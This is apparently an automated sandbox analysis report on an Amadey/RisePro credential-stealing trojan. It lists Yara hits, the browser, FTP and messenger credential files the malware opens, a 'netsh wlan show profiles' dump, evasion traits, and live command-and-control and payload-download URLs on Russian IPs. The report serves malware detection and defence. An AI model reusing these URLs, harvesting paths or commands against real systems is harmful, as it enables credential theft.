Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B1E27A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00B1E27A
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information
barindex
Yara detected Amadeys Clipper DLL
Source: Yara match File source: 13.2.rundll32.exe.6e5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Yara detected Amadeys stealer DLL
Source: Yara match File source: 13.2.rundll32.exe.6e5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.explorgu.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.amert.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorgu.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.explorha.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.explorha.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorha.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000003.2889754714.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2562352728.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1730374185.0000000000481000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2891590864.0000000000481000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1732891922.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1645556467.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2602620211.0000000000161000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2890551485.0000000000161000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2294672609.0000000004700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1746949833.0000000000481000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2530989609.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1690165240.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2897232652.000000006E5B1000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1706644741.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2571487121.00000000004A1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Yara detected RisePro Stealer
Source: Yara match File source: 0000000E.00000002.2899511665.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.2754517007.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2898506799.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2890560740.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2670876049.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 5904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 2252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 7008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 6888, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 6052, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 3176, type: MEMORYSTR
Tries to harvest and steal WLAN passwords
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\iryicPkAkDbGMYaxbGJHFHLYRIPerBQhGBmxioestlQZBCigBXWrqXelHzkVWCWICZDSbkfceIOIhu\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml Jump to behavior

Remote Access Functionality
barindex
Yara detected RisePro Stealer
Source: Yara match File source: 0000000E.00000002.2899511665.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.2754517007.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2438871880.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2890860265.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2890561636.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2898506799.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2440483320.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2578285726.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.2495106365.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2890551261.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2890560740.0000000000101000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2393485516.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2890907498.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.2670876049.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2891741375.00000000009A1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 5904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 2252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 7008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 6888, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ad0e9cf6d6.exe PID: 6052, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 3176, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1425502 Sample: SecuriteInfo.com.Win32.Troj... Startdate: 13/04/2024 Architecture: WINDOWS Score: 100 73 ipinfo.io 2->73 75 db-ip.com 2->75 87 Snort IDS alert for network traffic 2->87 89 Multi AV Scanner detection for domain / URL 2->89 91 Found malware configuration 2->91 93 17 other signatures 2->93 10 explorha.exe 1 28 2->10         started        15 SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe 5 2->15         started        17 explorha.exe 2->17         started        19 8 other processes 2->19 signatures3 process4 dnsIp5 79 193.233.132.56, 49737, 49738, 49740 FREE-NET-ASFREEnetEU Russian Federation 10->79 81 193.233.132.167, 49739, 49744, 49749 FREE-NET-ASFREEnetEU Russian Federation 10->81 61 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 10->61 dropped 63 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 10->63 dropped 65 C:\Users\user\AppData\...\b977f667d6.exe, PE32 10->65 dropped 69 8 other malicious files 10->69 dropped 123 Creates multiple autostart registry keys 10->123 125 Hides threads from debuggers 10->125 127 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->127 21 ad0e9cf6d6.exe 10->21         started        26 amert.exe 10->26         started        28 rundll32.exe 10->28         started        32 2 other processes 10->32 67 C:\Users\user\AppData\Local\...\explorha.exe, PE32 15->67 dropped 129 Detected unpacking (changes PE section rights) 15->129 131 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 15->131 133 Tries to evade debugger and weak emulator (self modifying code) 15->133 135 Tries to detect virtualization through RDTSC time measurements 15->135 30 explorha.exe 15->30         started        137 Antivirus detection for dropped file 17->137 139 Multi AV Scanner detection for dropped file 17->139 141 Machine Learning detection for dropped file 17->141 83 ipinfo.io 34.117.186.192, 443, 49762, 49763 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 19->83 85 db-ip.com 172.67.75.166, 443, 49766, 49767 CLOUDFLARENETUS United States 19->85 143 Tries to detect sandboxes and other dynamic analysis tools (window names) 19->143 145 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 19->145 file6 signatures7 process8 dnsIp9 77 147.45.47.93, 49745, 49746, 49747 FREE-NET-ASFREEnetEU Russian Federation 21->77 55 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 21->55 dropped 57 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 21->57 dropped 103 Multi AV Scanner detection for dropped file 21->103 105 Detected unpacking (changes PE section rights) 21->105 107 Machine Learning detection for dropped file 21->107 121 2 other signatures 21->121 34 schtasks.exe 21->34         started        36 schtasks.exe 21->36         started        59 C:\Users\user\AppData\Local\...\explorgu.exe, PE32 26->59 dropped 109 Antivirus detection for dropped file 26->109 111 Tries to evade debugger and weak emulator (self modifying code) 26->111 113 Hides threads from debuggers 26->113 38 rundll32.exe 23 28->38         started        115 Tries to detect sandboxes / dynamic malware analysis system (registry check) 30->115 117 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 30->117 119 System process connects to network (likely due to code injection or exploit) 32->119 file10 signatures11 process12 signatures13 41 conhost.exe 34->41         started        43 conhost.exe 36->43         started        95 Tries to steal Instant Messenger accounts or passwords 38->95 97 Uses netsh to modify the Windows network and firewall settings 38->97 99 Tries to harvest and steal ftp login credentials 38->99 101 2 other signatures 38->101 45 powershell.exe 26 38->45         started        49 netsh.exe 2 38->49         started        process14 file15 71 C:\Users\user\...\246122658369_Desktop.zip, Zip 45->71 dropped 147 Loading BitLocker PowerShell Module 45->147 51 conhost.exe 45->51         started        53 conhost.exe 49->53         started        signatures16 process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.117.186.192
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
147.45.47.93
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
172.67.75.166
 db-ip.com United States
13335 CLOUDFLARENETUS false
193.233.132.56
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
193.233.132.167
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false

Contacted Domains

Name IP Active
ipinfo.io 34.117.186.192 true
db-ip.com 172.67.75.166 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://193.233.132.56/Pneh2sXQk0/index.php?wal=1 true
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll true
  • 21%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://193.233.132.167/lend/alexxxxxxxx.exe false
  • 27%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://193.233.132.167/cost/random.exe false
  • 27%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://193.233.132.167/cost/sarra.exe false
  • 27%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll true
  • 22%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://193.233.132.167/mine/random.exe false
  • 24%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://193.233.132.56/Pneh2sXQk0/index.php true
  • 21%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://ipinfo.io/widget/demo/81.181.54.60 false
    		high
    http://193.233.132.167/mine/amert.exe false
    • 27%, Virustotal, Browse
    • Avira URL Cloud: malware
    		 unknown
    https://db-ip.com/demo/home.php?s=81.181.54.60 false
      		high